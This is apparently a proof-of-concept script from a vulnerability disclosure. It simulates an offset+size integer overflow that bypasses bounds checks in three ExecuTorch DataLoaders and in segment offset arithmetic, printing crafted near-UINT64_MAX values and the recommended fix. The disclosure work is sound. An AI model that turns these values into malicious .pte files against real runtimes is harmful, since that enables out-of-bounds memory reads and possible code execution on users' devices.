File size: 13,396 Bytes
a640dc8 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 | #!/usr/bin/env python3
"""
ExecuTorch DataLoader offset+size Integer Overflow (CWE-190 -> CWE-125)
=======================================================================
Target: ExecuTorch (pytorch/executorch)
Commit: 90e6e4ca4ef369ce4288ffcd2a0210d5137117dd
Affected Files:
- runtime/executor/mmap_data_loader.cpp:163
https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/runtime/executor/mmap_data_loader.cpp#L163
- runtime/executor/file_data_loader.cpp:150
https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/runtime/executor/file_data_loader.cpp#L150
- runtime/executor/file_descriptor_data_loader.cpp:161
https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/runtime/executor/file_descriptor_data_loader.cpp#L161
Safe Reference (uses overflow check):
- extension/data_loader/buffer_data_loader.h:38-41
https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/extension/data_loader/buffer_data_loader.h#L38-L41
Additionally affected — segment offset calculations:
- runtime/executor/program.cpp:96 (segment_base_offset + segment_data_size)
- runtime/executor/program.cpp:504 (segment_base_offset_ + segment->offset())
- runtime/executor/program.cpp:589 (segment_base_offset_ + segment->offset() + segment_info->segment_index())
CWE-190: Integer Overflow or Wraparound
CWE-125: Out-of-bounds Read
Description:
3 of 4 DataLoader implementations in ExecuTorch check `offset + size <= file_size_`
to validate that a Load request stays within bounds. However, when offset and size
are both attacker-controlled 64-bit values from a malicious .pte file, their sum
can overflow past UINT64_MAX and wrap around to a small value, bypassing the check.
BufferDataLoader is the ONLY implementation that correctly uses c10::add_overflows()
to detect the wraparound before performing the comparison.
A malicious .pte model file controls these values through the FlatBuffer schema:
- DataSegment.offset and DataSegment.size in the Program flatbuffer
- These flow directly into DataLoader::load(offset, size) calls
Impact:
An attacker crafting a malicious .pte file can cause out-of-bounds memory reads
(and potentially writes via mmap) by overflowing the offset+size bounds check.
This can lead to information disclosure or code execution.
"""
import struct
import sys
UINT64_MAX = (1 << 64) - 1
def simulate_unsafe_check(offset: int, size: int, file_size: int) -> dict:
"""
Simulates the UNSAFE bounds check used in 3 of 4 DataLoaders:
if (offset + size > file_size_) {
return Error::InvalidArgument;
}
This is vulnerable because offset + size can overflow uint64_t.
"""
# C++ uint64_t addition wraps modulo 2^64
wrapped_sum = (offset + size) & UINT64_MAX
check_passes = wrapped_sum <= file_size
return {
"offset": offset,
"size": size,
"file_size": file_size,
"offset_plus_size_wrapped": wrapped_sum,
"offset_plus_size_true": offset + size,
"check_passes": check_passes,
"is_actually_valid": (offset + size) <= file_size, # Python arbitrary precision
}
def simulate_safe_check(offset: int, size: int, file_size: int) -> dict:
"""
Simulates the SAFE bounds check used in BufferDataLoader:
size_t total;
if (c10::add_overflows(offset, size, &total) || total > file_size_) {
return Error::InvalidArgument;
}
c10::add_overflows() detects the wraparound and rejects it.
"""
true_sum = offset + size
overflows = true_sum > UINT64_MAX
if overflows:
check_passes = False # add_overflows catches it
else:
check_passes = true_sum <= file_size
return {
"offset": offset,
"size": size,
"file_size": file_size,
"overflow_detected": overflows,
"check_passes": check_passes,
"is_actually_valid": true_sum <= file_size,
}
def print_result(label: str, result: dict, safe: bool = False):
status = "PASS (allows load)" if result["check_passes"] else "FAIL (rejects load)"
valid = "YES" if result["is_actually_valid"] else "NO"
print(f" [{label}]")
print(f" offset = 0x{result['offset']:016X} ({result['offset']})")
print(f" size = 0x{result['size']:016X} ({result['size']})")
print(f" file_size = 0x{result['file_size']:016X} ({result['file_size']})")
if not safe:
print(f" offset+size (uint64 wrapped) = 0x{result['offset_plus_size_wrapped']:016X} ({result['offset_plus_size_wrapped']})")
print(f" offset+size (true) = 0x{result['offset_plus_size_true']:X}")
else:
print(f" overflow_detected = {result['overflow_detected']}")
print(f" Bounds check: {status}")
print(f" Actually within file? {valid}")
if result["check_passes"] and not result["is_actually_valid"]:
print(f" >>> VULNERABILITY: check passes but access is OUT OF BOUNDS <<<")
print()
def main():
print("=" * 78)
print("ExecuTorch DataLoader offset+size Integer Overflow PoC")
print("CWE-190 (Integer Overflow) -> CWE-125 (Out-of-bounds Read)")
print("=" * 78)
print()
# -------------------------------------------------------------------------
# Scenario 1: Classic overflow — large offset + small size wraps to small value
# -------------------------------------------------------------------------
print("-" * 78)
print("SCENARIO 1: Classic overflow (large offset + small size)")
print("-" * 78)
print()
print(" Attacker sets offset=0xFFFFFFFFFFFFFFF5, size=100 in malicious .pte file.")
print(" Real file is only 1024 bytes.")
print()
file_size = 1024
offset = 0xFFFFFFFFFFFFFFF5 # Very large, near UINT64_MAX
size = 100
# Show the math explicitly
true_sum = offset + size
wrapped = true_sum & UINT64_MAX
print(f" Math:")
print(f" 0xFFFFFFFFFFFFFFF5 + 100 = 0x{true_sum:X}")
print(f" Truncated to uint64: 0x{wrapped:016X} = {wrapped}")
print(f" {wrapped} <= {file_size}? {'YES => check passes!' if wrapped <= file_size else 'NO'}")
print()
unsafe = simulate_unsafe_check(offset, size, file_size)
safe = simulate_safe_check(offset, size, file_size)
print_result("UNSAFE (mmap/file/fd DataLoader)", unsafe, safe=False)
print_result("SAFE (BufferDataLoader)", safe, safe=True)
# -------------------------------------------------------------------------
# Scenario 2: Offset just barely overflows
# -------------------------------------------------------------------------
print("-" * 78)
print("SCENARIO 2: Minimal overflow — offset = UINT64_MAX, size = 1")
print("-" * 78)
print()
offset2 = UINT64_MAX
size2 = 1
file_size2 = 4096
wrapped2 = (offset2 + size2) & UINT64_MAX
print(f" Math:")
print(f" 0x{offset2:016X} + 1 = 0x{(offset2+size2):X}")
print(f" Truncated to uint64: 0x{wrapped2:016X} = {wrapped2}")
print(f" {wrapped2} <= {file_size2}? {'YES => check passes!' if wrapped2 <= file_size2 else 'NO'}")
print()
unsafe2 = simulate_unsafe_check(offset2, size2, file_size2)
safe2 = simulate_safe_check(offset2, size2, file_size2)
print_result("UNSAFE (mmap/file/fd DataLoader)", unsafe2, safe=False)
print_result("SAFE (BufferDataLoader)", safe2, safe=True)
# -------------------------------------------------------------------------
# Scenario 3: Both offset and size are large
# -------------------------------------------------------------------------
print("-" * 78)
print("SCENARIO 3: Both offset and size large — read 1GB at offset near UINT64_MAX")
print("-" * 78)
print()
size3 = 1 * 1024 * 1024 * 1024 # 1 GB
offset3 = UINT64_MAX - size3 + 2 # Wraps to exactly 1
file_size3 = 1024 * 1024 # 1 MB file
wrapped3 = (offset3 + size3) & UINT64_MAX
print(f" offset = UINT64_MAX - 1GB + 2 = 0x{offset3:016X}")
print(f" size = 1 GB = 0x{size3:016X}")
print(f" file = 1 MB = 0x{file_size3:016X}")
print(f" Math:")
print(f" offset + size = 0x{(offset3 + size3):X}")
print(f" Truncated: 0x{wrapped3:016X} = {wrapped3}")
print(f" {wrapped3} <= {file_size3}? {'YES => check passes!' if wrapped3 <= file_size3 else 'NO'}")
print()
unsafe3 = simulate_unsafe_check(offset3, size3, file_size3)
safe3 = simulate_safe_check(offset3, size3, file_size3)
print_result("UNSAFE (mmap/file/fd DataLoader)", unsafe3, safe=False)
print_result("SAFE (BufferDataLoader)", safe3, safe=True)
# -------------------------------------------------------------------------
# Scenario 4: Legitimate access (no overflow)
# -------------------------------------------------------------------------
print("-" * 78)
print("SCENARIO 4: Legitimate access (sanity check — no overflow)")
print("-" * 78)
print()
offset4 = 256
size4 = 512
file_size4 = 1024
unsafe4 = simulate_unsafe_check(offset4, size4, file_size4)
safe4 = simulate_safe_check(offset4, size4, file_size4)
print_result("UNSAFE (mmap/file/fd DataLoader)", unsafe4, safe=False)
print_result("SAFE (BufferDataLoader)", safe4, safe=True)
# -------------------------------------------------------------------------
# Code comparison
# -------------------------------------------------------------------------
print("=" * 78)
print("CODE COMPARISON")
print("=" * 78)
print()
print("VULNERABLE (mmap_data_loader.cpp:163, file_data_loader.cpp:150,")
print(" file_descriptor_data_loader.cpp:161):")
print()
print(' if (offset + size > file_size_) {')
print(' ET_LOG(Error, "offset %zu + size %zu > file_size_ %zu",')
print(' offset, size, file_size_);')
print(' return Error::InvalidArgument;')
print(' }')
print()
print("SAFE (buffer_data_loader.h:38-41):")
print()
print(' size_t total;')
print(' if (c10::add_overflows(offset, size, &total) || total > data_size_) {')
print(' return Error::InvalidArgument;')
print(' }')
print()
# -------------------------------------------------------------------------
# Segment offset overflows in program.cpp
# -------------------------------------------------------------------------
print("=" * 78)
print("RELATED: Segment Offset Overflows in program.cpp")
print("=" * 78)
print()
print("The same pattern appears in segment offset calculations:")
print()
# program.cpp:96 — segment_base_offset + segment_data_size
print(" program.cpp:96:")
print(" size_t segment_base_offset = program_data_size;")
print(" // segment_base_offset + segment_data_size can overflow")
print()
seg_base = 0xFFFFFFFFFFFFFF00
seg_data_size = 0x200
wrapped_seg = (seg_base + seg_data_size) & UINT64_MAX
print(f" segment_base_offset = 0x{seg_base:016X}")
print(f" segment_data_size = 0x{seg_data_size:016X}")
print(f" Sum (uint64 wrapped) = 0x{wrapped_seg:016X} = {wrapped_seg}")
print(f" >>> Overflows to small value, subsequent offset checks use wrong base")
print()
# program.cpp:504 — segment_base_offset_ + segment->offset()
print(" program.cpp:504:")
print(' const void* segment_data = static_cast<const uint8_t*>(segment_data_.data)')
print(' + segment_base_offset_ + segment->offset();')
print()
seg_base2 = 0x8000000000000000
seg_offset = 0x8000000000000001
wrapped_ptr = (seg_base2 + seg_offset) & UINT64_MAX
print(f" segment_base_offset_ = 0x{seg_base2:016X}")
print(f" segment->offset() = 0x{seg_offset:016X}")
print(f" Sum (uint64 wrapped) = 0x{wrapped_ptr:016X} = {wrapped_ptr}")
print(f" >>> Pointer arithmetic wraps, points to attacker-controlled offset")
print()
# -------------------------------------------------------------------------
# Summary
# -------------------------------------------------------------------------
print("=" * 78)
print("SUMMARY")
print("=" * 78)
print()
print(" 3 of 4 DataLoader implementations use `offset + size > file_size_`")
print(" which is vulnerable to uint64_t overflow. The 4th (BufferDataLoader)")
print(" correctly uses c10::add_overflows() to detect wraparound.")
print()
print(" Attack vector: Malicious .pte model file with crafted segment offsets")
print(" and sizes that cause the bounds check to pass via integer overflow,")
print(" leading to out-of-bounds memory access.")
print()
print(" Fix: Use c10::add_overflows() in all DataLoader implementations,")
print(" matching the pattern already used in BufferDataLoader.")
print()
# Return non-zero if any vulnerability was demonstrated
vuln_count = sum(1 for r in [unsafe, unsafe2, unsafe3]
if r["check_passes"] and not r["is_actually_valid"])
print(f" Vulnerabilities demonstrated: {vuln_count}/3 overflow scenarios bypass check")
return 0 if vuln_count == 0 else 1
if __name__ == "__main__":
sys.exit(main())
|